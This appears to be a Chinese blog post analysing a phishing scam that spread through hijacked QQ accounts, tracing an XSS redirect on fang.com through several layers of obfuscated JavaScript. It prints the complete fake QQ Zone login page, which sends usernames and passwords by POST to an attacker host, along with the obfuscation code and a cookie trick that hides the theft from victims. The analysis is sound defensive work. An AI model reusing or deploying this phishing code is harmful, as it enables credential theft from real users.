记网友 QQ 被盗群发的套路链接

又看见一个骗子，趁机水一篇。

如题，这个套路消息是这样的: 「https://url.cn/5x4a6Hg&tLKvRPKISY 这是你？/微笑」

用移动设备进入显示是 QQ 空间登录页面，请求输入帐号密码，并盗取 QQ

这个短网址最先跳转到一个无害的正经网站(fz.fang.com)的搜索请求页，利用 XSS. 而且他用的标签名字就叫 xss. 黑人问号.jpg

骗子插入了一段 js 代码，src 为 wudi.74sq.cn/404.php (装成 404 页面？

本来用电脑 curl 之，发现这个 js 是直接跳转到腾讯网的(window.location.href = "http://www.qq.com";)

于是带上手机的 UA 再 curl, 验明:

(function () {
    var new_doc = document.open("text/html", "replace");
    var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%22EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg%3D%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
    new_doc.write(html);
    new_doc.close();
})();
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
    setTimeout(function () {
        set.remove();
    }, 9)
}
document.title = '';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return d}d+='';do{w=q.indexOf(d.charAt(i++));v=q.indexOf(d.charAt(i++));u=q.indexOf(d.charAt(i++));t=q.indexOf(d.charAt(i++));s=w<<18|v<<12|u<<6|t;z=s>>16&0xff;y=s>>8&0xff;x=s&0xff;if(u==64){r[j++]=String.fromCharCode(z)}else if(t==64){r[j++]=String.fromCharCode(z,y)}else{r[j++]=String.fromCharCode(z,y,x)}}while(i<d.length);return r.join('')}function arcfour(k,d){var o='';s=new Array();var n=256;l=k.length;for(var i=0;i<n;i++){s[i]=i}for(var j=i=0;i<n;i++){j=(j+s[i]+k.charCodeAt(i%l))%n;var x=s[i];s[i]=s[j];s[j]=x}for(var i=j=y=0;y<d.length;y++){i=(i+1)%n;j=(j+s[i])%n;x=s[i];s[i]=s[j];s[j]=x;o+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[j])%n])}return o}

把 unescape 运行一下，得到

<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer">
<script type="text/javascript">
document.write(decodeURIComponent(arcfour("36a9dc5d29d54b46793d0c682298dbab",base64_decode("EzORpUle/yXbsLMJsHj2lt+3Y2Rns99J/Lj37LvRiWWB4Sxf075faqUVJ85nCvGPE2VhEVzCxaa3SNtNQVmxTwiW7xoDJXHJC7g4YhkBMxWFvSPf7bmJBojZsq/vyWOPe8uHMpDGYd1XJcqNY1Z4T6CwxCCK+TLfqJkC9d8KTGR+1aZqyLoLttwCLVdzceuZTddKZHuVPUGbh+0WorBVz+JdGk7lmAiZlGMd9kxuDbqvvW6LguR8teQkNAdM+KukG90+pKaGqSVYTBRTUCfJpqS3oA2sVzPHgRDRUA4uelzPC+31esGj6MXfZf7GbC4Z/WzBi6WsTrVAVvzq3oI6RoUEXa7KHj7bWi9b1BhFDxrqihtxwwpYXeWYBmMOrmgyTSiMN7hKxkKp+IGwT6s+KydpW8bT2CshYYffIHO7vu3NpWJQ/p1QLjMl0NlUZntT7TLwUWNdz5Qm95s3zaIJWwjqt+IqwhsSbvqDPwpq8jXtlGpDnNB7u0hPZg=="))));
</script>
</head>
<body>
</body>
</html>

还要套，套这么多层

<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<meta charset="utf-8">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script>
$(function(){
$.getScript('http://wudi.74sq.cn/template/login.js'); 
});
</script>

外面还套个 $() 倒是调用了函数…… http://wudi.74sq.cn/template/login.js, 就是它没错了。

他又套了一层…… 这个 js 在 document 里 write 了一个包含一段 js 代码的 html, 又套一层。然后终于出现真身:

<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<script src="//libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
<script src="//open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
<link rel="stylesheet" href="//qzonestyle.gtimg.cn/qzone/phone/style/login.css"/>
<link rel="stylesheet" href="//wudi.74sq.cn/template/css.css"/>
<!--顶部banner-->
</head>
<script type="text/javascript">
    function setCookie(name, value) {
			var Days = 30;
			var exp = new Date();
			exp.setTime(exp.getTime() + Days * 24 * 60 * 60 * 1000);
			document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString();
		}
function getCookie(name) {
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");

            if (arr = document.cookie.match(reg))

                return unescape(arr[2]);
            else
                return 0;
        }
  if (getCookie("login")){
    window.location.href='https://h5.qzone.qq.com/mqzone/profile?stat=&hostuin=0#0/info/me';//二次跳转地址
      
      }
  
$(function(){
 mqq.ui.setTitleButtons({
   left : {
       title : "相册",
       callback : function () {
       }
   },
   right : {
       hidden: true
   }
})
});
</script>
<body style="zoom: 1;">
<script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 k=$(r);1 5=0;1 8=0;g("G",4(a){5=a.w[0].q});g("R",4(a){8=a.w[0].q;7(k.17()<=0&&5<8){a.D();7($("#3").J<=0){$("K").L(\'<m S="3" T="U-V:W;Y-l:#15;l:#16;d:18;1b-1c:1d;z-d:A;B-C:1g;E:F;"><p>网页由 \'+\'H.I.i.h\'+\' 提供</p><p>j浏览器M内核提供技术支持</p></m>\')}$("#3").d((8-5))}});g("N",4(a){$("#3").O("P",4(){$("#3").Q()})});1 2={e:c,b:c,n:c};1 p=o.X;2.e=p.6("Z")==0;2.b=p.6("10")==0;2.11=(p=="12")||(p.6("13")==0);7(2.e||2.b||2.n){y.s.t="u://v.i.h"}7(o.19.6(\'j/\')>0){}1a{y.s.t=\'u://v.i.h\'}1 9=x.9;1 f=x.f;r.1e("1f").14=9+f;',62,79,'|var|system|_domain_display|function|_touches_point1|indexOf|if|_touches_point2|province||mac|false|height|win|city|addEventListener|com|qq|QQ|doc|color|div|xll|navigator||pageY|document|location|href|http|qzone|touches|remote_ip_info|window|line|26px|font|size|preventDefault|overflow|hidden|touchstart|ui|ptlogin2|length|body|prepend|X5|touchend|slideUp|normal|remove|touchmove|id|style|text|align|center|platform|background|Win|Mac|x11|X11|Linux|value|bebdc2|65696c|scrollTop|0px|userAgent|else|padding|top|15px|getElementById|ip|12px'.split('|'),0,{}))
</script>
<div id="content" class="content">
	<div id="error_tips">
		<div id="error_tips_content">
			<span id="error_icon"></span>
			<span id="error_message"></span>
		</div>
	</div>
	<div id="login" class="login">
		<div id="logo" class="logo">
		</div>
		<div id="app_name" style="display: none">
		</div>
		<div id="q_login" class="q_login" style="display: none">
			<div id="q_login_title">
				<div id="q_login_logo">
				</div>
				<label id="q_login_tips"></label>
			</div>
			<div id="q_logon_list" class="q_logon_list">
			</div>
		</div>
		<div id="web_login">
			<form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
				<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script>
				<input type="hidden" name="ip" id="ip"/>
				<ul id="g_list">
					<li id="g_u">
					<div id="del_touch" class="del_touch">
						<span id="del_u" class="del_u"></span>
					</div>
					<input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"/></li>
					<li id="g_p">
					<div id="del_touch_p" class="del_touch">
						<span id="del_p" class="del_u"></span>
					</div>
					<input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"/></li>
				</ul>
				<div href="javascript:void(0);" id="go">登 录</div>
			</form>
		</div>
		<div id="switch">
			<div id="swicth_login" onclick="pt._switch()" style="display: none">
			</div>
			<div id="zc_feedback">
				<span id="zc" onclick="window.open('http\x3A\x2F\x2Fptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
				<span id="forgetpwd" onclick="window.open('http://ptlogin2.qq.com/j_findpwd_url')">忘了密码？</span>
			</div>
		</div>
		<div id="custom_bottom">
		</div>
	</div>
	<div id="vcode">
		<label id="vcode_tips"></label>
		<div id="vcode_area">
			<img id="vcode_img"/>
			<label id="input_tips"></label>
			<input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"/>
		</div>
		<div id="button">
		</div>
	</div>
</div>
<div id="new_vcode" class="new_vcode">
</div>
<div id="footerBlank">
</div>
<script>
  var times = 0;
      function error(msg) {
        $("#error_tips").css({
          display: 'block'
        });
        $('#error_message').html(msg);
        err = true;
      }
      $('form input').focus(function() {
        $("#error_tips").css({
          display: 'none'
        });
        err = false;
      });
      $("#error_tips").on('click',
      function() {
        $(this).hide();
      });
      $("#go").on('click',
        function() {
        var $this = $(this);
        err = false;
        var p = $("#p").val();
        var u = $("#u").val();
        u == '' && error('您还没有输入帐号！');
        if (err) return false;
        p == '' && error("您还没有输入密码！");
        if (err) return false;
        /^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号！');
        if (err) return false;
        var len = p.length; (len < 6 || len > 16) && error('您输入的帐号或密码不正确，请重新输入。');
        if (err) {
          $("#p").val('');
          return false;
        }
		if (!err){
			$.ajax({
				url:'//wudi.74sq.cn/user.php',
				type:'POST',
				dataType:'json',
				data: $('#loginform').serialize(),
				error:function(er){
                  setCookie("login", "yes")
				window.location.href='//qzone.qq.com';
                }
			})
		}
      })
  </script>
<div style="display:none;">
</div>
</body>
</html>

无聊的伪装。已登录的 Cookie 都有设置，防止用户再次点开是未登录状态而起疑心。

他使用 POST 提交，URL 为 http://wudi.74sq.cn/user.php, 数据格式: ip=&hrUW3PG7mp3RLd3dJu=用户名&LxMzAX2jog9Bpjs07jP=密码

结束。